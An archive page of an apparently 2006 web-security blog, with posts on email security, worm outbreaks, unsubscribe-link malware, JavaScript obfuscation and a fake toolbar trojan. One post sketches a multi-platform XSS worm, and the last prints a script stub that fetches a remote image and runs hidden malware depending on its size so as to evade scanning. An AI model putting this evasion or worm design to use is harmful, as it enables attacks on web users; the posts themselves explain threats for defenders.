Cenzic 232 Patent
Paid Advertising
web application security lab

Archive for the 'Anti-Virus' Category

99 Email Security Tips

Sunday, November 26th, 2006

I ran across this article today on 99 ways to secure your email. Largely it’s email etiquette and efficiency fluff and there are really only a small handful of actual ways to secure your email in it (numbers 78-99). There are a few tips that I’d tell people that are definitely not mentioned on their list. Here are a few from my personal list:

1) Turn off preview panes. When you click an email and it shows up in the preview you are rendering the remote images and the click-tracking that spammers use to verify the email lists executes. That alerts them to the fact that you a) are a real user and b) are a user who reads spam. Having your email automatically open also increases the likelihood of email client automatic exploitation. None of those are good, so turn off the preview pane.

2) Don’t put email addresses or sensitive corporate information into out of office emails. If you are out of office, just tell them the name of who to get in contact with. If they know anything about your company they’ll know how to get in touch with the front desk and use the person’s name to get in touch with them. A number of times people have set out of office messages with stuff like, “If you need information on super secret project x please contact….” Firstly, that’s bad if it’s someone who doesn’t really know you (sales people, etc…) secondly, if it contains email addresses those too can be scraped by the spammers who watch the return addresses for bounces.

3) Use domain keys, SPF (sender policy framework) records or other tools to reduce spoofing. If you want to allow people to know if you are legitimately sending email from all users on your domain without causing them too much grief, install domain keys or use SPF records to reduce the likelihood of people successfully spoofing your email. PGP signing is great but it only works for the one person using it, unlike domain keys.

4) Unlike what the article says do NOT use Yahoo or Hotmail as methods to send anonymous emails. Both send headers showing the recipient where you are originating from. Use something like hushmail instead.

5) Create custom email accounts for specific applications. I’ve seen a number of people who have begun building out vanity email addresses based on the specific site they are visiting, EG: ha.ckers.org@mysite.com

6) Validate users who are allowed to send email to you. This is an ugly one but by only allowing people who you have authorized to email you you can significantly reduce unsolicited email. You had better not use one of these accounts for anything you want to get electronic receipts for, but for personal accounts it’s a pretty decent solution.

7) Use a fake or modified name on each site you visit. If my name is “John Smith” I could use something like John Petsmart Smith will allow me to know that Petsmart has sold my email information when I get spam or phishing emails in the future.

Anyway, there are dozens of ways to secure your email. I’m sure everyone can contribute to this list. It’s a huge topic, that they really only scratched the surface of.

Grey Goo Attacks Second Life

Monday, November 20th, 2006

I know this isn’t 100% on topic, but I really get a kick out of viral issues in social networks. In this case there is a new virus that hit Second Life that auto-replicates a particular item all over the world. Second Life is an interactive game where users can create their own land and items etc for actual money. Sounds like trouble to me. Mixing personal interest with untested designs is often cause for exploitation.

In this case the virus called Grey Goo (named after the theory that a molecular self replicating machine could destroy the earth and turn it, essentially into grey goo) ended up taking the game down for just a little while as they fixed the issue. A minor annoyance, some bad press and a few lost customers at worst. But think about how bad self replicating code really is. There is no actual distinction between that and any genetic self replicating organism.

The only major difference is that we are personally immune the effects of the viruses (at least for the most part). It’s annoying, but we have out of band mechanisms for dealing with code. But think about a future where everything has an IP address. Something as simple as a flicker can cause epilepsy. A bug could drive your car off the road. A glitch could cause all the dams in the country to open up and flood the surrounding areas. Thankfully this grey goo scenario could be stopped by out of band mechanisms, but the more we automate systems in the physical world the less and less easy it will become to be completely in control of the machines we build.

It’s awfully nice to have the big red panic button. Let’s just make sure we don’t automate that too.

AJAX Worm Demo Code

Sunday, October 29th, 2006

Today Anurag Agarwal posted a link to the WASC list that demonstrates a conceptual manual AJAX worm. Actually that’s sort of a misnomer since this really is just using XMLHTTPRequest and not XML but you get the idea. The link is benign, but what it does show is a very slowed down and non malicious version of an XMLHTTPRequest worm that propagates via XMLHTTPRequest only (only on Anurag’s domain and only for the files he links to).

This is an interesting take on what we’ve been talking about. Of course it’s extremely slowed down because it’s not meant to overtake anything, and it’s all manual (you can see that the URL field does not change). This is kind of interesting when you can’t XSS the page your interested in but you are able to XSS at least one page that a user will end up clicking on.

The conceptual Warhol worms that I’ve worked on really have very few user requirements save that the user views a page that’s under the control of the worm and has the appropriate technologies installed. But breaking it down into it’s core components is definitely one step to understanding the most effective virulence methodologies. XMLHTTPRequest is definitely a technology worth thinking about though, especially combined with browser bugs like internet explorer’s mhtml: issue et al. Any way to move from one system to another makes the power of such a worm far more potent.

Email Risks

Thursday, August 31st, 2006

There’s an interesting link over at Network Blog talking about a survey done of a number of office workers who were completely unaware of the risks involved with email security. Namely most of the users interviewed were happy to open any email they got and even worse click on links regardless of who sent it.

They then link to an article at Application Security Blog that discusses how webbugs work in the context of emails. Email clients are becoming more and more resistant to this trick now a days because they now ask if users would like to download images. Of course there are ways to circumvent those security measures (consumers preffer convenience and will turn almost any security measure off if they can if they don’t understand how it’s protecting them).

As we’ve seen malware is pretty prevolant these days - (at least 1/10th the spam I get has .zip or .src or other horrible attachments). Of course this goes beyond the realm of Outlook, Lotus and Thunderbird to the realm of Yahoo Mail, Hotmail and Gmail. Scanning attachments for viruses is one free service that a lot of these webmail clients offer, but it certainly doesn’t offer security from zero-day exploits - so one off targeted attacks will always be possible. And of course there are phishing aspects, or simply links that lead to malicious websites with all sorts of consequences (like the unsubscribe link and the JavaScript port scanner).

Email is a pretty scary medium these days. Part of the problem is that email clients and web browsers are becoming more full featured as user demands on functionality rise. These issues are only partially under control at the moment, but the interaction between software is becoming more and more complex and it is only allowing more and more vectors as a result. The fact that email can call the web is an issue, but there are tons of other applications that are starting to do the same (even things as obscure as online games). It will be interesting to watch these vectors morph as user interest in the mediums shift. Instant messaging is a great example as it gradually overtakes email in popularity and as it becomes more and more feature rich.

Unsubscribe Link Malware

Wednesday, August 30th, 2006

Phaithful sent me an interesting bit of what looks at first glance to be spam. Normally I don’t care much about this stuff, but this was actually fairly interesting as it uses social engineering to ask users to click an unsubscribe link (something I typically don’t do as that is a way for spammers to verifiy that your address is valid). Upon clicking the unsubscribe link you are taken to a page with four embedded iframes. Those iframes run a series of JavaScripts that attempt various exploits (one of the files was named metasploit.exe… so that should give you an idea).

Proceed to this URL with extreme caution, it is definitely not benign.

It always is interesting to see a shift in tactics though. Using obfuscated JavaScript is not new. embedding malware into pages isn’t new either. But what is new is using an unsubscribe link to sucker people into visiting the page in the first place. Yet another reason to not click on Unsubscribe links. I guess the CAN SPAM act is the newest tool in virus writer’s toolkit. Educating users that unsubscribe links must be present and function is just anther tool in the arsenal now.

Yet Another Remote Shell

Tuesday, August 29th, 2006

Here’s another one of the failed attacks on ha.ckers.org. I copied the file in case anyone wants to do forensics on it. It’s located here. The odd part is that it is a .gif file. I’m not sure what filter they were attempting to evade by renaming the file, but it didn’t do much.

Is anyone cataloguing this stuff? Should I continue to post it? If not I’ll save myself the trouble, but I wanted to keep it here for any of the AV guys who visit the site. They may get more out of this stuff than other people.

De-Obfuscation Woes

Tuesday, August 1st, 2006

I ran into an interesting article on SANS that I think proves an interesting point in the next generation of JavaScript Malware, which is browser dependant and self-dependant decoding. This article explains two techniques used by the malware author to return different values depending on how you attempt to dump the code in a visible way, as well as dependant on the browser you use. This is a very interesting read, because it seems like this is the first time the SANS guys have done this which makes it for a more interesting read than it would have been if I had said the same thing, as well as the fact that it describes in pretty good detail about the deobfuscation issues they ran into themselves.

I too use nearly the exact same methodology as the author does. Unfortunately there is no good tool that I have come across like a JavaScript decompiler that would have completely obviated this issue. The closest I’ve come across is a decompiler that is based on having no dom whatsoever (not particularly useful when we are talking about a web-page). It would be interesting to have such a tool, though, because it would make it possible to traverse a JavaScript function without worrying about it actually executing without warning. Sure, you can do other things like watch the HTTP traffic in transit (easy enough to do) but that may not be enough information (perhaps it calls different sites at different times of day, or based on your browser type, or your screen width or any of hundreds of other variables).

Of course a decompiler would have similar issues, because it would still only follow a specific path based on the variables you had off hand, so perhaps that’s not the best way to do it. Another possibility is measuring relative entropy. If a JavaScript function has high entropy, it could be considered untrustworthy. Of course then the Malware author could submit a lot of nulls or whitespace or other characters to be stripped which would bring the entropy down to much lower levels. All of these ideas probably need a lot more thought, but JavaScript really is beginning to show off how obfuscation really does make straight detection much harder.

Fake Google Toolbar

Monday, July 31st, 2006

Well, it was just a matter of time, but there are finally some reports of a fake google toolbar executable that hides a trojan horse.  Great!  Well, I always knew it would happen, and I’ve been warning people for ages,  “If you put executables on your webpage, it’s just a matter of time before the phishers do the same thing.”  Thankfully the barrier to entry in building executables is still fairly high, making this a fairly small attack vector, but used in combination with hacking a big DNS could be huge.  Think about what a fake Microsoft Windows Update could do in terms of numbers!

This probably falls into the Pharming category rather than Phishing, as it doesn’t actually intend to directly compromise you by asking you for information, but it does try to get you to download something based on a brand that you are supposed to trust.  To my knowledge this is the first time this has ever happened.  But getting someone to install this toolbar could lead to information loss, but also to more phishing, because the anti-phishing built into the Google Toolbar will obviously be turned off.  Pretty nasty.  Executables are pretty nasty.

I’m still waiting for a day when there will be a single signing authority for executables so you can know what is real and what isn’t.  Google Toolbars should be signed by a central authority, and your machine shouldn’t even let you download it unless you know where it comes from and can verify that.  That might be a pipe dream, and that would kill a lot of the little guys, but if it at least warned you that it wasn’t signed that might give people a clue that it wasn’t Google.  Either that or they’d just click through.  This is frustrating, because there isn’t really a good answer, other than better detection of fraudulent websites claiming to be big brands.

Cross Site Scripting Warhol Worm

Friday, July 28th, 2006

Several years ago I read a paper called Owning the Internet in your spare time. Besides being the single best security paper I’ve ever read coming out of a college, it opens the door to a new classification of viral propogation in the security community. The basic premise is this. Traditional viruses travel in a very innefficient manner. They scan a series of hosts either nearby their netblock or just start at a single point in the entire IP space and start scanning in one direction. Then when they find a vulnerable host they infect it and start scanning in the same place all over again. As I said, super innefficient. The concept of a Warhol worm is what Andy Warhol was famous for - “15 minutes of fame“. A virus that could propogate in 15 minutes globally.

Now in spite of the great premise of the paper above, it still lacks some reality (in talking with some viral genetic researchers). There are two things that make this paper infeasable. The first is that it requires users to have their computers on. Typically that is a follow the sun model. The fastest you can get a worm to travel is slightly less than the time it takes for every computer on the planet to turn on and be infected (approximately 24 hours). The other problem is network traffic. If you have every machine in the world probing for computers, it can take down huge sections of the network, so you have to have some mitigating factors to make sure only high bandwidth hosts are capable of scanning large chunks of the network and stay relatively geographically close to their origin until the next time zone is awake. The first example of a Warhol worm (or Flash worm) was the SQL Slammer worm which used a psuedo-random number generator for propagation.

So assuming you could figure these issues out (they aren’t that difficult - but I’ll leave it as an academic excersize) how does this affect cross site scripting (XSS)? Let’s take a look at the MySpace Samy worm for a second. That affected 1MM users, in a fairly non diverse location (mostly users in the United States). 1MM users is a LOT of infected machines, but still not enough. Let’s take it one step further. Let’s pretend for a second that there are users who have access to multiple websites that are similar to MySpace (it stands to reason that if a user is accessing MySpace they probably have other accounts elsewhere as well). Finding vulnerabilities in multiple platforms should be relatively easy (it has been historically anyway).

Now let’s say instead of simply just attacking MySpace, the worm also attacks MyYearBook.com or another similar social networking site with another significant amount of users. Suddenly you have an XSS worm that can jump from platform to platform. Now let’s take it one step further, and say you find multiple vulnerabilities in social networking platforms located in every time zone around the world. If you tie them together you now have a social networking XSS worm that can leap from platform to platform and infect huge chunks of the global population. Now, let’s take it still one step further and say that we can embed certain exploits in known open source applications like PHP nuke, etc… Scanning the local IP space, using a search engine with the keywords that match a likely candidate for exploit then connecting the browser to it and attempting to exploit the vulnerabilities could make a worm that could theoretically attack nearly every computer on the internet that was used by an internet facing user.

Instead of affecting 1MM users it could be 1 billion users, and it wouldn’t have to have much genetic diversity to do that, because it would only have to survive for one day. The ramifications of a worm like that propagating across the internet could be disasterous. The payload could be something as easy as a DDoS, or the largest phishing platform mankind has ever seen, or even as stupid as just flooding the global network for a day (anyone need a vacation day?). Critical infrastructures could not handle and additional billions of requests a day (and I doubt the search engines themselves could handle the billions of additional searches being performed), which could easily flood off tons of networks, particuarly the smaller ones, even with no payload. The cost to businesses could be in the billions.

It might not be 15 minutes of fame, but 24 hours of infamy is probably just as scary. I’m really trying to hold back on my fear-mongering, but this isn’t fiction - it just hasn’t been built (yet).

Remote Execution of XSS Malware

Friday, July 21st, 2006

One of the main problems with detecting cross site scripting (XSS) is that it is not an easy feat to traverse the document object model (DOM). Rendering engines are slow, and they are processor intensive. But let’s just suspend disbelief for a second and say that we could do exactly that. On every new submission to every form, let’s pretend we had enough processor time to execute each submission once and see the results before it was sent to the browser, looking for anything that might denote something malicious from a web application security perspective.

That would be great, in theory! I could suddenly remove obfuscation (the entire reason for the XSS Cheat Sheet) as an attack vector, because I could detect any possible variant, just by watching the DOM execute. Pretty slick, right? Well, no. Even setting aside for a second the problem mentioned above with processing power, there are other troubling issues with this.

The first is timed functions, or remote execution. The problem with JavaScript from a detection and parsing standpoint is that it is a full fledged language, that supports all sorts of interesting things. One of those interesting things is the ability to pull in remote information and do analysis on it. Let’s say I set up a JavaScript function specifically to pull in a remote image (from a server I have at least partial control over). If the image is over a certain height or width or the combination is just right, the JavaScript will execute malware. If you get really tricky you can use a combination of sized images as a decoding key for some enciphered peice of code. Here’s an example:


<SCRIPT>
image_1 = new Image();
image_1.src= "http://ha.ckers.org/images/kcpimp.jpg";
if (image_1.width > 1 ) {
// Execute malware
}
</SCRIPT>

Now, that pretty much puts to rest the notion that you could traverse the DOM and get the same results as the user will (once I switch the images out). So if I know you are going to scan my block of code prior to letting it get posted, I can simply allow it to stay put until that grace period is over. When I’m convinced that you won’t be scanning it any further, I’ll change the images out, and the code will execute for all future users, until I either change it back, or the code is removed.

There is still one other problem, which is that you have to pick a rendering engine to do this with. You’re now saying, “Well, of course you do! That’s a stupid thing to say!” Well which one would you pick? IE seems to have the most vectors that effect it and the highest penetration, so that would seem to be the obvious choice, but are you going to allow the Gecko (Firefox) only vectors to go through - thereby allowing double digit percentages to be infected by the malware? Tough choice, and certainly not bullet proof.

The remote execution issue is the biggest in my mind, though. Because the attack is now controlled by a remote device (an image or series of images) it is now out of the hands of the user to even decrypt if you so choose. Typically JavaScript is a very easy function to de-obfuscate, if you have the human eyes and time to do it, but in this case, if the images aren’t there or are different sizes, the decryption is meaningless. And even if you could scan every single input, you’d still be at the mercy of a timed function where the image changed after a certain point.

This could give a ceneral command and control aspect to XSS worms, where the central image controlled the timing function, as to keep the attack under wraps until the timing was right. This would be particularly effective in DoS attacks. The downside is that the single command and control is easy to remove - unlike self sufficient viral code which depends on nothing but itself and the machine for propogation and originating page for roots to continue growth.